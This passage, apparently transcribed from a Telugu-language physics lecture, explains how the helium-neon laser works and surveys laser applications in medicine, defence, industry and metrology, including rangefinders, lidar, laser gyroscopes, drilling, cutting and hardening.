ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్ళడం జరుగుతుంది. హౌ దిస్ లేజర్ లైట్ వర్క్స్, ఇందులో వర్కింగ్ ఫినామినన్ ఎలా ఉంది. ఈ ఎలక్ట్రికల్ డిశ్చార్జ్ వల్ల ఫస్ట్ ఆఫ్ ఆల్ హీలియం ఆటమ్స్ ఎనర్జీని అబ్జర్వ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్ E3, E5లోకి ఈ హీలియం ఆటమ్స్ వెళ్ళడం జరుగుతుంది. ఈ రెండు కూడా E3, E5 స్టేట్స్ హీలియం ఆటమ్స్కి మెటాస్టేబుల్ స్టేట్స్ కాబట్టి అక్కడికి వెళ్ళిన ఎలక్ట్రాన్స్ ఎక్కువ టైం స్పెండ్ చేస్తాయి, అంటే వాటంతట అవి కిందికి రావు. కనుక హీలియం ఆటమ్స్ యొక్క పాపులేషన్ ఇన్వర్షన్ అనేది E3, E5 స్టేట్స్లో అచీవ్ అవ్వడం జరుగుతుంది. E3, E5 స్టేట్స్లో ఉన్న హీలియం ఆటమ్స్ గ్రౌండ్ స్టేట్లో ఉన్న ఈ నియాన్ ఆటమ్స్తో కొలిషన్ జరుపుతాయి. కొలిషన్ జరిపినప్పుడు ఈ కొలిషన్ ప్రాసెస్లో హీలియం ఆటమ్స్ కొంత ఎనర్జీని ఈ నియాన్ ఆటమ్స్కి ట్రాన్స్ఫర్ చేస్తాయి. నియాన్ ఆటమ్స్కి ట్రాన్స్ఫర్ చేసిన ఈ ఎనర్జీని నియాన్ ఆటమ్స్ అబ్జార్బ్ చేసుకొని ఇవి ఎగ్జైటెడ్ స్టేట్స్కి వెళ్తాయి. అదేవిధంగా హీలియం ఆటమ్స్ ఎనర్జీని లాస్ అయిపోవడం వల్ల మళ్ళీ తిరిగి గ్రౌండ్ స్టేట్కి రావడం జరుగుతుంది. సో అది ఈ ఫిగర్లో మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో నియాన్ ఆటమ్స్ అనేవి ఎగ్జైటెడ్ స్టేట్లో ఉన్న హీలియం ఆటమ్స్తో కొలిషన్స్ జరపడం వల్ల అవి E3, E4, E5 ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్తాయి. కానీ అదే సమయంలో హీలియం ఆటమ్స్ ఎగ్జైటెడ్ స్టేట్స్లో ఉన్న ఈ హీలియం ఆటమ్స్ తిరిగి E1 అనే గ్రౌండ్ స్టేట్కి రావడం జరుగుతుంది. ఇందులో హీలియం ఆటమ్స్కి E4-, E5- రెండు కూడా మెటాస్టేబుల్ స్టేట్స్. నియాన్ ఆటమ్స్కి E4-, E5- ఈ రెండు స్టేట్స్ కూడా మెటాస్టేబుల్ స్టేట్స్. అంటే అక్కడికి వెళ్ళిన నియాన్ ఆటమ్స్ వాటంతట అవి తిరిగి కిందికి రాలేవు. సో ఆ విధంగా మనకి ఈ మెటాస్టేబుల్ స్టేట్స్లో నియాన్ ఆటమ్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. గ్రాడ్యువల్గా ఇంక్రీజ్ అవ్వడం వల్ల ఈ రెండు స్టేట్స్లో నియాన్ ఆటమ్స్ యొక్క పాపులేషన్ ఇన్వర్షన్ అనేది జరుగుతుంది. ఈ నియాన్ ఆటమ్స్లో పాపులేషన్ ఎప్పుడైతే ఇన్వర్షన్ జరిగిందో అప్పుడు మనకి స్పాంటేనియస్ ఎమిషన్ జరగడానికి ఒక హై ప్రాబబిలిటీ ఉంటుంది. ఈ స్పాంటేనియస్ ఎమిషన్ వల్ల E4- నుంచి E3- కానీ లేదా E5- నుంచి E3- కానీ ఒక ఫోటాన్ అనేది ఎమిట్ అవ్వడం జరగవచ్చు. ఈ ఎమిటెడ్ ఫోటాన్ అనేది ఆ ట్యూబ్ యొక్క లెంత్ వెంబడి ట్రావెల్ చేస్తూ అటుపక్క ఇటుపక్క రిఫ్లెక్టర్స్ ఉండడం వల్ల ఆ రిఫ్లెక్టర్స్ వల్ల రిఫ్లెక్షన్స్కి అండర్గోన్ అవుతూ ఏదో ఒక సమయంలో ఇంకొక ఎగ్జైటెడ్ నియాన్ ఆటమ్తో ఇవి కొలిషన్స్ జరుపుతాయి. ఎగ్జైటెడ్ నియాన్ ఆటమ్తో ఎప్పుడైతే ఇవి కొలిషన్స్ జరిపాయో ఆ ఎగ్జైటెడ్ నియాన్ ఆటమ్ని కిందికి గ్రౌండ్ స్టేట్కి పంపిస్తూ ఎనర్జీని ఫోటాన్ రూపంలో ఎమిట్ చేయడం జరుగుతుంది. సో ఈ విధంగా మనకి ప్రాసెస్ చైన్ రియాక్షన్ కంటిన్యూస్గా జరుగుతూ ఫైనల్గా మనకి అవుట్పుట్ లేజర్ లైట్ రూపంలో మనకి బయటకు వస్తుంది. ఈ బయటకు వస్తున్న లేజర్ లైట్ యొక్క వేవ్ లెంత్ 632.8 నానోమీటర్స్. సో ఇది కూడా మనకి విజిబుల్ రీజియన్లో ఉంది కాబట్టి <7,000 కాబట్టి ఇది కూడా విజిబుల్ రీజియన్లో ఉన్న లేజర్ లైట్. అయితే ఇందులో అప్లికేషన్స్ ఏంటంటే హీలియం నియాన్ లేజర్ యొక్క అప్లికేషన్స్. అందులో ఫస్ట్ వన్, ఇట్ ఈస్ ఆల్సో యూజ్డ్ ఫర్ ప్రొడక్షన్ ఆఫ్ హలోగ్రామ్స్. రెండోది యూజ్డ్ ఇన్ ల్యాబొరేటరీస్. మూడోది యూజ్డ్ ఇన్ ఆప్టికల్ కమ్యూనికేషన్ సిస్టమ్స్. అదేవిధంగా వీటి అడ్వాంటేజెస్ ఏంటి, ఇది కంటిన్యూస్ అవుట్పుట్ని ఇస్తుంది, అదేవిధంగా లెస్ ఎక్స్పెన్సివ్. లాస్ట్ వన్, దీనికి స్టెబిలిటీ చాలా ఎక్కువ. సార్
Next, we are going to discuss about applications of lasers. Lasers can be applied in various fields. అందులో ఫస్ట్ వన్ మెడిసిన్లోను, రెండోది కమ్యూనికేషన్స్లోను, మూడోది మనకి మిలిటరీ ఆర్ డిఫెన్స్ సెక్టర్లోను, నెక్స్ట్ వన్ ఇండస్ట్రియల్ సెక్టర్స్లోను, లాస్ట్ వన్ రీసెర్చ్లోను, అదేవిధంగా మనకి ఎంటర్టైన్మెంట్లో కూడా ఈ లేజర్స్ని ఉపయోగించవచ్చు. ఇందులో ఫస్ట్ మెడిసిన్లో ఎక్కడ వాడతారు? ఇన్ మెడిసిన్ లేజర్ రీసర్ఫేసింగ్ అనేది ఒక ప్రాసెస్ ఉంది. ఈ లేజర్ రీసర్ఫేసింగ్ ప్రాసెస్లో మన స్కిన్ మీద ఉన్న డ్యామేజ్డ్ సెల్స్ని ఈ లేజర్స్ ఉపయోగించి ఎలిమినేట్ చేయడం వల్ల ఆ ప్లేసెస్లో యంగరు హెల్దియర్ సెల్స్ డెవలప్ అవుతాయి. ఇందులో మనం వాడేది CO2 లేజర్కి వాడతాం. ఈ CO2 లేజర్ ఏమవుతుందంటే మన స్కిన్ కింద ఉన్న కొలేజన్ని స్టిమ్యులేట్ చేయడం వల్ల మన స్కిన్ అనేది స్మూత్గా అవుతుంది. ఫర్ ఎగ్జాంపుల్ ఈ ఫిగర్లో కనుక మనం అబ్జర్వ్ చేస్తే ఇక్కడున్న ఈ డ్యామేజ్డ్ సెల్స్లో స్కిన్ మీద ఉన్న డ్యామేజ్డ్ సెల్స్ అన్నింటినీ ఈ ఫినామినన్ ద్వారా ఎలిమినేట్ చేయడం వల్ల ఆ స్కిన్ హెల్దీగాను యంగర్గాను కనబడుతుంది ఈ ఫిగర్లో. ఇది లేజర్ రీసర్ఫేసింగ్ ఫినామినన్. అదేవిధంగా రెండో దానికి వచ్చేసరికి బ్లూ లైట్ థెరపీ అనేది వాడడం జరుగుతుంది. ఈ బ్లూ లైట్ థెరపీలో ఏమవుతుంది, స్కిన్ మీద ఉన్న ఎన్లార్జ్డ్ పోర్స్, అదేవిధంగా పెర్సిస్టెంట్ యాక్నే అంటే ఏంటంటే మనకి అడాల్సెంట్ స్టేజ్లో మన ఫేస్ మీద రెడ్ కలర్ మచ్చలు వస్తుంటాయి. ఇది ఎందుకు వస్తున్నాయంటే మనకి గ్లాండ్స్లో ఓవర్ సెక్రేషన్ వల్ల ఈ రెడ్ కలర్ మచ్చలు అనేవి ఏర్పడడం జరుగుతుంది. వీటన్నిటిని కూడా మనం ఈ లేజర్స్ ఉపయోగించి తీయడం జరుగుతుంది. అందులో అదేవిధంగా స్కేర్స్, మనం ముఖంపై ఏర్పడిన వివిధ రకాల మచ్చలు, మనకి పుట్టు మచ్చలే ఉన్న వాటన్నిటిని కూడా మనం ఈ లేజర్స్ ఉపయోగించి ఎలిమినేట్ చేయొచ్చు. ఈ ఫిగర్లో మనకి ఇక్కడిక్కడ ఉన్న రెడ్ కలర్స్ ఈ యాక్నే మొత్తం కూడా మనకి లేజర్ ట్రీట్మెంట్ వల్ల, బ్లూ లైట్ థెరపీ ట్రీట్మెంట్ వల్ల మొత్తం ఫేస్ అంతా కూడా క్లీన్గా మారుతుంది. అండ్ ఇందులో వాడేవి ఎక్కువగా ఎఫర్మ్ లేజర్స్ వాడుతుంటాం ఫేషియల్ రీజనరేషన్కి. అదేవిధంగా మనం ఇంకొక ట్రీట్మెంట్ వాడింది ఏంటంటే టీఎంఆర్ అంటే ట్రాన్స్ మైకార్డియల్ లేజర్ రీజనరేషన్. ఇదేం చేస్తుంది, మన హార్ట్లో ఉన్న ఆర్టరీస్ లేదా కరోనరీ ఆర్టరీస్లో బ్లడ్ బ్లాక్ అయితే ఈ బ్లడ్ బ్లాకేజ్ని మనం ఎలిమినేట్ చేస్తూ ఆ ఛానల్స్ని రీఓపెన్ చేయడానికి ఉపయోగపడుతుంది. ఇందులో వాడేది ఏంటంటే CO2 లేజర్ వాడతాం. ఈ CO2 లేజర్ ఏం చేస్తుందంటే హార్ట్లో ఉన్న స్మాల్ ఛానల్స్ని ఓపెన్ చేయడం వల్ల బ్లడ్ ఫ్లో అనేది హార్ట్లో ఫాస్ట్గా జరుగుతుంది. ఈ ప్రాసెస్లో మనం ఏం చేస్తామంటే లెఫ్ట్ చెస్ట్ ఇన్సిషన్ ద్వారా కానీ లేదా సెంటర్లో ఇన్సిషన్ ద్వారా కానీ ఆ ఛానల్స్ను ఓపెన్ చేయడం జరుగుతుంది. ఇది ఎక్కువగా బైపాస్ కరోనరీ ఆర్టరీ సర్జరీతో ఈ ప్రాసెస్ అనేది మనం ఎక్కువగా చేయడం జరుగుతుంది. అదేవిధంగా థర్డ్ ట్రీట్మెంట్ ఏంటంటే నెక్స్ట్ ఫైబర్ ఆప్టిక్ లేజర్ క్యాటహెటర్. ఇది దేనికి ఉపయోగపడుతుంది, ట్రీట్మెంట్ ఆఫ్ బ్లీడింగ్ అల్సర్స్లో ఉన్న బ్లీడింగ్ని ఎలిమినేట్ చేయడానికి ఇది ఉపయోగపడుతుంది. ఏదైనా ఒక అల్సరు కంటిన్యూస్గా బ్లీడ్ అవుతూ ఉంటే ఈ లేజర్ వల్ల ఆ అల్సర్ నుంచి వస్తున్న బ్లడ్ మొత్తం ఫోటోకాగులేట్ అవ్వడం వల్ల అక్కడ బ్లీడింగ్ అనేది స్టాప్ అవ్వడం జరుగుతుంది. నెక్స్ట్ ప్రాసెస్ ఏంటంటే లేజర్ ఎండోస్కోపీ. ఈ లేజర్ ఎండోస్కోపీ అనేది ట్యూమర్స్లో మనం డైరెక్ట్గా ట్రీట్ చేయడానికి ఉపయోగపడుతుంది. ఏదైతే ట్యూమర్ ప్లేస్ ఉందో అక్కడ ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ దాని మీద పడేసరికి ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ వల్ల ఆ ట్యూమర్లో ఉన్న సెల్స్ అన్నీ కూడా డెస్ట్రాయ్ అవుతుంది. ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ని ఒక కంప్యూటర్ కంట్రోల్డ్ ఎక్విప్మెంట్ ద్వారా మనం కంట్రోల్ చేయొచ్చు. నెక్స్ట్ అప్లికేషన్ ఏంటంటే లేజర్ గ్లేజింగ్. ఈ లేజర్ గ్లేజింగ్ ఏంటి, మన టీత్ మీద ఉన్న డికే మొత్తాన్ని కూడా చారింగ్ చేయడానికి ఉపయోగపడుతుంది. ఫర్ ఎగ్జాంపుల్ ఏదైనా మన టీత్ క్యావిటీస్లో ఏదైనా డ్యామేజ్డ్ పార్ట్ కానీ లేదా ఇన్ఫెక్షన్స్ కానీ ఏమైనా ఉంటే ఈ లేజర్ బీమ్, హై ఎనర్జీ లేజర్ బీము ఆ క్యావిటీస్లో ఉన్న ఈ డ్యామేజ్డ్ సెల్స్ని మొత్తం డెస్ట్రాయ్ చేసి ఆ టీత్ మొత్తాన్ని కూడా మనకి శుభ్రం చేయడానికి ఈ లేజర్ గ్లేజింగ్ ఫినామినన్ అనేది వాడతాం. నెక్స్ట్ డిఫెన్స్ సెక్టార్లో మనం ఎక్కడెక్కడ వాడతాం, ఫస్ట్ వన్ అనేది ఈ లేజర్ రేంజ్ ఫైండర్స్. ఈ లేజర్ రేంజ్ ఫైండర్స్ దేనికి ఉపయోగపడతాయి, ఎనిమీ ట్యాంక్స్ యొక్క పొజిషన్ని కానీ యాక్యురేట్గా మనం ఫైండ్ అవుట్ చేయడానికి ఉపయోగపడుతున్నాయి. ఇందులో వాడేది మనకి నియోడినం లేజర్స్ కానీ CO2 లేజర్స్ కానీ. ఈ లేజర్ రేంజ్ ఫైండర్స్ దేని మీద ఆధారపడుతూ పనిచేస్తాయి, ఇవి మనకి రాడార్ అప్లికేషన్స్ మీద లేదా రాడార్ ప్రిన్సిపల్ మీద ఆధారపడుతూ ఈ రేంజ్ ఫైండర్స్ అనేవి పనిచేస్తాయి. ఇందులో మళ్ళీ రెండు రకాలు ఉన్నాయి, ఒకటి ట్యాంక్ లేజర్ రేంజ్ ఫైండర్స్, రెండోది పోర్టబుల్ లేజర్ రేంజ్ ఫైండర్స్. ట్యాంక్ లేజర్ రేంజ్ ఫైండర్స్ ఎక్కడ వాడతామంటే మనకి ఆర్మర్డ్ వెహికల్స్లో కానీ ట్రక్స్లో కానీ ఆర్టిలరీలో కానీ వాడతాం. పోర్టబుల్ లేజర్ రేంజ్ ఫైండర్స్ ఆర్టిలరీలో ఉన్న ఫైర్ కంట్రోల్ సిస్టమ్స్లో వాడడం జరుగుతుంది. నెక్స్ట్ అండర్ వాటర్ లేజర్. ఈ లేజర్ని మనం అండర్ వాటర్ కమ్యూనికేషన్ కూడా వాడచ్చు.
అయితే ఏ లేజర్స్ అయితే మనకి బ్లూ గ్రీన్ రీజియన్లో లేజర్ లైట్ని ఎమిట్ చేస్తున్నాయో అవి మాత్రమే మనం ఈ అండర్ వాటర్ కమ్యూనికేషన్కి వాడతాం. ఎందుకంటే బ్లూ గ్రీన్ రీజియన్ అనేది మోస్ట్ సూటబుల్ ట్రాన్స్మిషన్ ఇన్ సీ వాటర్. ఆ రీజియన్ మోస్ట్ సూటబుల్గా ఉంటుంది. నెక్స్ట్ ఆ అండర్ వాటర్ కమ్యూనికేషన్ అనేది ఎక్కువగా మనం నావీలో వాడతాం, నావీ సెక్టర్లో వాడుతుంటాం. ఇందులో వాడే లేజర్స్ NDYAG లేజరు, అదేవిధంగా ఆర్గాన్ అయాన్ లేజరు, గ్యాస్ లేజర్స్ కూడా వాడడం జరుగుతుంది. అయితే ఈ లేజర్స్ వల్ల ఉపయోగం ఏంటి? టార్పెడో సబ్మెరైన్స్ నుంచి వెలువడుతున్న టార్పెడోస్న కానీ లేదా అన్మాన్డ్ వెహికల్స్ కానీ ఏమైనా ఉంటే వాటిని గైడ్ చేయడానికి ఉపయోగపడుతుంది. నెక్స్ట్ ఈ సబ్మెరైన్స్ మధ్య కమ్యూనికేషన్ అనేది విత్ అబ్సల్యూట్ ప్రైవసీ, అంటే ఇంకొకరికి తెలియకుండా సబ్మెరైన్స్ మధ్య కమ్యూనికేషన్ అనేది మనం ఈజీగా చేయొచ్చు. అయితే వీటికి మనం ఎక్కువగా వాడేది, మనం ప్రజెంట్ డేస్లో వాడేది సోనార్. అయితే సోనార్ వల్ల కొన్ని లిమిటేషన్స్ ఉన్నాయి. ఏమవుతుందంటే సోనార్ వేవ్స్ అనేవి మనకి ఎప్పుడైతే అబ్స్ట్రక్షన్స్లో మనకి వేల్స్ కానీ డాల్ఫిన్స్ కానీ మెరైన్ లివింగ్ యానిమల్స్ కానీ ఏమైనా వస్తే ఫాల్స్ సిగ్నల్స్ వస్తాయి సోనార్ వేవ్స్ వల్ల. రెండోది, ఈ సోనార్ వేవ్స్ అనేవి సీ వాటర్ వల్ల బ్రాడనింగ్కి, నెక్స్ట్ స్కాటరింగ్ ఫినామినాకి లోనవుతాయి. నెక్స్ట్ ఈ సోనార్ వేవ్స్ ఎమిట్ చేస్తున్న సోర్స్ని మనం లేదా ఎనిమీస్ ఈజీగా ఫైండ్ అవుట్ చేయొచ్చు. అంటే ఇది ప్రైవసీ ఉండదు, సీక్రసీ ఉండదు. కానీ ఆ సోనార్ ప్లేస్లో మనం ఈ అండర్ వాటర్ కమ్యూనికేషన్కి లేజర్స్ వాడితే మన సీక్రసీ అనేది లేదా ప్రైవసీ అనేది ఈజీగా మెయింటైన్ అవుతుంది. అదేవిధంగా రీసెంట్గా ఈ అండర్ వాటర్ కమ్యూనికేషన్ అనేది వయా శాటిలైట్ జరుగుతుంది. అంటే గ్రౌండ్ స్టేట్ నుంచి శాటిలైట్కి వెళ్ళి సిగ్నల్స్, ఆ శాటిలైట్ నుంచి అండర్ వాటర్ స్టేషన్కి అనేది ఈ కమ్యూనికేషన్ అనేది సిగ్నల్స్ రూపంలో పంపించడం జరుగుతుంది. నెక్స్ట్ లేజర్ గైడెడ్ యాంటీ ట్యాంక్ మెసైల్. ఇందులో ఒక మెసైల్ అనేది మనకి ఒక ట్యాంక్ నుంచి వెలువడుతున్న మెసైల్ అనేది అది IR బీమ్ వల్ల కంట్రోల్ అవుతూ IR బీమ్ వల్ల గైడ్ అవుతుంది. అంటే ఆ మెసైల్లో ఒక లేజర్ సోర్స్ ఉంటుంది. ఈ లేజర్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైటు ఎదురుగా ఉన్న టార్గెట్ మీద ఇన్సిడెంట్ అయ్యి ఆ టార్గెట్ నుంచి వస్తున్న స్కాటర్డ్ రేడియేషన్ వల్ల ఈ మెసైల్ వైపు రావడం వల్ల ఆ మెసైల్లో ఉన్న ఫోటో డిటెక్టరు ఆ టార్గెట్ నుంచి వస్తున్న స్కాటర్డ్ రేడియేషన్ని ఫైండ్ అవుట్ చేస్తూ ఆ టార్గెట్ యొక్క పొజిషన్ ఎక్కడుందో అనేది ఖచ్చితంగా ఈ మెసైల్కి చెప్తూ ఆ మెసైల్ కరెక్ట్గా టార్గెట్ని రీచ్ అయ్యే విధంగా ఇది గైడ్ చేస్తూ ఉంటుంది. ఫర్ ఎగ్జాంపుల్ ఇక్కడ కానీ మనం క్లియర్గా అబ్జర్వ్ చేస్తే ఈ మెసైల్ IR రేడియేషన్ వల్ల గైడ్ అవుతూ కరెక్ట్గా టార్గెట్ని రీచ్ అవుతుంది. అయితే ఇందులో వాడేది NDYAG లేజర్ వాడతాం. అదేవిధంగా ఇందులో మనకి ట్యాంక్ అనేది ఈజీగా టార్గెట్ని లేదా ట్యాంక్ని కానీ ఈజీగా మనం రీచ్ అవ్వచ్చు. నెక్స్ట్ వన్ ఈజ్ లీడార్. లీడార్ అంటే ఏంటి? లేజర్ని కనుక రాడార్ అప్లికేషన్స్ వాడితే దాన్ని మనం లీడార్ అంటున్నాం. ఇందులో కనుక అబ్జర్వ్ చేస్తే మనం ఈజీగా మనం డిస్టెన్సెస్ని యాక్యురేట్గా మరియు కరెక్ట్ వాల్యూస్ని మనం ఫైండ్ అవుట్ చేయొచ్చు. ఇందులో వాడే లేజర్స్ COT లేజరు, అదేవిధంగా గ్యాలియం ఆర్సెనైడ్ లేజర్ ఎక్కువగా వాడుతున్నాం. ఇందులో మెయిన్ డ్రాబ్యాక్ ఏంటంటే వెదర్ కండిషన్స్ గుడ్గా ఉండాలి. ఈ లీడార్ని వాడుతున్నప్పుడు వెదర్ కనుక కరెక్ట్గా లేకపోతే అందులో ఉన్న ఫాగ్ వల్ల కానీ, రెయిన్ వల్ల కానీ లేదా స్నో వల్ల కానీ ఈ లేజర్ బీమ్ అటెన్యూట్ అవ్వడం వల్ల మనకి లీడార్ అనేది కంప్లీట్గా వర్క్ అవ్వదు. కనుక వెదర్ కండిషన్స్ గుడ్గా ఉంటేనే ఈ లీడార్ అనేది మనం వాడచ్చు. లేని పక్షంలో మనకి యాక్యురేట్ మెజర్మెంట్స్ రావు, మళ్ళీ మనం రాడార్ మీద మాత్రమే డిపెండ్ అవ్వాలి. నెక్స్ట్ లేజర్ గైరోస్కోప్. ఈ లేజర్ గైరోస్కోప్ దేనికి ఉపయోగపడుతుంది? ఈ లేజర్ గైరోస్కోప్ అనేది స్మాల్ రొటేషన్స్ని కానీ మెజర్ చేయడానికి కానీ లేదా వాటిని ఫైండ్ అవుట్ చేయడానికి కానీ ఈ లేజర్ గైరోస్కోప్ వాడబడుతుంది. ఈ లేజర్ గైరోస్కోప్లో ఉండే లేజర్స్ ఏంటి? ఇందులో ఎక్కువగా వాడేది మనం హీలియం నియాన్ లేజర్ వాడతాం. ఈ హీలియం నియాన్ లేజర్ అనేది వాడడం వల్ల అక్కడ రొటేషన్ బాడీ యొక్క రొటేషన్ ఫినామినన్ మీద ఆధారపడుతూ సాగ్నెస్ ఎఫెక్ట్ అనేది ఒకటి ఉంది. ఈ సాగ్నెస్ ఎఫెక్ట్ ఏం చెప్తుంది? ఈ సాగ్నెస్ ఎఫెక్ట్ వల్ల ఏమవుతుందంటే బాడీలో ఏమాత్రం రొటేషన్ వచ్చినా ఆ రొటేషను ఇంటర్ఫెరోమీటర్ టెక్నిక్ వల్ల మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో ఆటోమేటిక్గా బాడీ యొక్క రొటేషన్ని కానీ ఎంత యాంగిల్ రొటేట్ అయిందని కానీ ఈ లేజర్ గైరోస్కోప్ ఇన్స్ట్రుమెంట్ ఉపయోగించి మెజర్ చేయొచ్చు. అయితే ఈ లేజర్ గైరోస్కోప్ ఇన్స్ట్రుమెంట్ ఎక్కడ వాడతాం? ఇది మనకి ఇనర్షియల్ గైడెన్స్ ఆఫ్ మెసైల్స్లో కానీ, ఎయిర్ క్రాఫ్ట్స్లో కానీ, షిప్స్లో కానీ, మనం ఫ్లైట్ కంట్రోల్ సిస్టమ్స్లో కానీ ఈ లేజర్ గైరోస్కోప్ అనేది వాడడం జరుగుతుంది. నెక్స్ట్ ఎయిర్ రీకొనెసెన్స్ అంటే ఏంటి? ఇప్పుడైతే మనం ఎనిమీ యొక్క ట్యాంక్స్ని కానీ నైట్ టైంలో సీక్రెట్గా ఫోటోగ్రఫీ తీయాలి అంటే మనం వాటిని లేజర్ లైట్స్ ఉపయోగించి తీయొచ్చు. ఇన్ ఓల్డెన్ డేస్లో మనం అక్కడ ఏం చేసేవాళ్ళం అంటే కెమెరాస్ పెట్టి పవర్ స్ట్రోబ్స్ లైటింగ్ ఫెసిలిటీ పెట్టి మనం అప్పుడు ఫొటోస్ తీసేవాళ్ళం. కానీ ఇప్పుడు లేజర్ లైట్ పెట్టడం వల్ల సీక్రెట్గా మనం బయట వాళ్ళకి తెలియకుండా ఒక ఫ్లైట్ వెళ్తున్నప్పుడు కిందనున్న మొత్తం
పిక్చర్ అంతటిని కూడా మనం ఫొటోస్ రూపంలో హై రెజల్యూషన్లో మనం ఫోటోగ్రఫీస్ని అబ్జర్వ్ చేయొచ్చు. ఇందులో వాడేది హీలియం నియాన్ లేజరు, అదేవిధంగా గ్యాలియం ఆర్సెనైడ్ లేజర్. నెక్స్ట్ లేజర్ డ్రిల్లింగ్. ఇండస్ట్రీస్ పర్పసెస్లో ఫస్ట్ ప్రాసెస్ లేజర్ డ్రిల్లింగ్. ఈ లేజర్ డ్రిల్లింగ్ ఏం చేస్తుంది, ఇది ఫేస్ హీటింగ్ ఫినామినన్ మీద ఆధారపడుతూ వర్క్ అవుతుంది. ఇందులో ఒక సర్ఫేస్ మీద హై ఇంటెన్సిటీ లేజర్ బీమ్ పడడం వల్ల ఆ సర్ఫేస్ మొత్తం టెంపరేచర్ పెరగడం వల్ల అది మొత్తం కూడా మెల్ట్ అవుతుంది. మెల్ట్ కావడం వల్ల అక్కడున్న సర్ఫేస్ యొక్క మెటీరియల్ యొక్క టెంపరేచరు బాయిలింగ్ పాయింట్ టెంపరేచర్ కన్నా పెరిగినప్పుడు అది మొత్తం ఆ సర్ఫేస్లో మీద ఉన్న మెటీరియల్ మొత్తం కూడా వేపర్ స్టేట్లోకి మారుతుంది. యాజ్ అ రిజల్ట్ అక్కడ హోల్ ఏర్పడుతుంది. ఇందులో వాడే లేజర్స్ CO2 లేజర్ వాడతాం, అదేవిధంగా NDYAG లేజర్ వాడతాం. ఈ ఫినామినన్ మనం డైమండ్స్లో కానీ రుబీ క్రిస్టల్స్లో కానీ హోల్స్ని డ్రిల్ చేయడానికి వాడతాం. నెక్స్ట్ లేజర్ మైక్రో మెషినింగ్. ఈ లేజర్ మైక్రో మెషినింగ్ దేనికి ఉపయోగపడుతుంది, ఇది మైక్రోమీటర్ సైజ్డ్ ఏరియాస్ని పక్కనున్న ఏరియాస్ ఏవి డ్యామేజ్ అవ్వకుండా హీట్ చేయడానికి ఉపయోగపడుతుంది. అదేవిధంగా టైనీ ఎలక్ట్రానిక్ సర్క్యూట్స్ అనేవి సెరమిక్ సబ్స్ట్రేట్స్ మీద ఫార్మ్ అవ్వడానికి కూడా ఈ మైక్రో మెషినింగ్ అనేది వాడడం జరుగుతుంది. నెక్స్ట్ లేజర్ కటింగ్. ఈ లేజర్ ఫర్ ఎగ్జాంపుల్ గ్రాఫైట్ కానీ డైమండ్ కానీ నెక్స్ట్ సెరమిక్ సబ్స్టెన్సెస్ కానీ లేదా కార్బైడ్ కానీ టంగ్స్టన్ కానీ కట్ చేయాలంటే మనం ఈ లేజర్ కటింగ్ ఫినామినన్ అనేది వాడుతున్నాం. ఇందులో అన్ని గ్యాసెస్ లేజర్స్ మనం వాడుకోవచ్చు. అయితే గ్యాస్ లేజర్స్తో పాటు వాటిని అసిస్ట్ చేయడానికి ఆక్సిజన్ గ్యాస్ కానీ కార్బన్ డైఆక్సైడ్ కానీ కలిపి పంపించాల్సి ఉంటుంది. అయితే ఎక్కువగా ఈ లేజర్ కటింగ్ ఫినామినన్ ప్రజెంట్ డేస్లో గార్మెంట్ ఇండస్ట్రీస్లో వాడుతున్నాం. గార్మెంట్ ఇండస్ట్రీస్లో ఏమవుతుందంటే ఎక్కువ లేయర్స్లో ఉన్న క్లాత్ని థిక్ క్లాత్ని అట్ ఏ టైం సింగిల్ టైం ఇంటర్వెల్లో చాలా షార్ట్ టైం ఇంటర్వెల్లో కట్ చేయడానికి మనం ఈ లేజర్ కటింగ్ ఫినామినన్ అనేది గార్మెంట్ ఇండస్ట్రీలో వాడడం జరుగుతుంది. నెక్స్ట్ లేజర్ హార్డనింగ్. లేజర్ హార్డనింగ్లో జరిగే ప్రాసెస్ ఏంటి, అది ఒక సర్ఫేస్ మెటీరియల్ సర్ఫేస్ని ఇర్రేడియేషన్ ప్రాసెస్ అనేది షార్ట్ ఇంటర్వెల్ ఆఫ్ టైంలో ఇర్రేడియేషన్ గురి చేస్తే ఆ పైన మెటీరియల్ మొత్తం మనకి మెల్ట్ అవుతుంది. పైన మెటీరియల్ మొత్తం మెల్ట్ అవుతుంది, కానీ కిందనున్న మెటీరియల్ ఇమీడియట్గా కూలింగ్ అరేంజ్మెంట్కి లోన్ కావడం వల్ల ఆ మెటీరియల్ మొత్తం హార్డెన్ అవుతుంది. కాబట్టి మొత్తం కిందనున్న మెటీరియల్ కూడా హార్డెనింగ్ అవ్వడం వల్ల ఇది మనకి పాసిబుల్ సబ్స్టిట్యూషన్ ఆఫ్ ఎక్స్పెన్సివ్ అలాయ్ స్టీల్స్. అలాయ్ స్టీల్స్లో ఎక్స్పెన్సివ్ మెటీరియల్స్ ఏమైనా ఉంటే వాటి ప్లేసెస్లో ఈ లేజర్ హార్డెనింగ్ ద్వారా తయారు చేయబడిన మెటీరియల్స్ వాడుకోవచ్చు. ఇందులో మనం వాడేది CO2 లేజర్. నెక్స్ట్ మెట్రాలజీ. మెట్రాలజీలో ఏమవుతుందంటే మనం ఆప్టికల్ క్యారెక్టరిస్టిక్స్ని కానీ లేదా వెలాసిటీస్ని కానీ లెంత్ని కానీ మెజర్ చేయడం జరుగుతుంది. నెక్స్ట్ అదేవిధంగా మనకి డిస్టెన్సెస్ని వేవ్ లెంత్ రూపంలో మెజర్ చేయొచ్చు. ఇందులో మనం వాడేది హీలియం నియాన్ లేజర్. నెక్స్ట్ ఇందులో మనం వాడే డివైస్ లేజర్ అల్టిమీటర్. ఈ లేజర్ అల్టిమీటర్ దేనికి ఉపయోగపడుతుందంటే ఎయిర్ క్రాఫ్ట్స్ యొక్క హైట్ ఎంత హైట్లో ఉన్నాయి గ్రౌండ్ నుంచి ఆ హైట్ని మెజర్ చేయొచ్చు. అలాగే వాటి రేట్ ఆఫ్ అసెంట్ని కానీ రేట్ ఆఫ్ డిసెంట్ని కానీ మెజర్ చేయొచ్చు. నెక్స్ట్ ఇందులో క్లౌడ్స్ ఉంటే డిఫరెంట్ క్లౌడ్స్ ఆ క్లౌడ్స్ ఎర్త్ సర్ఫేస్ 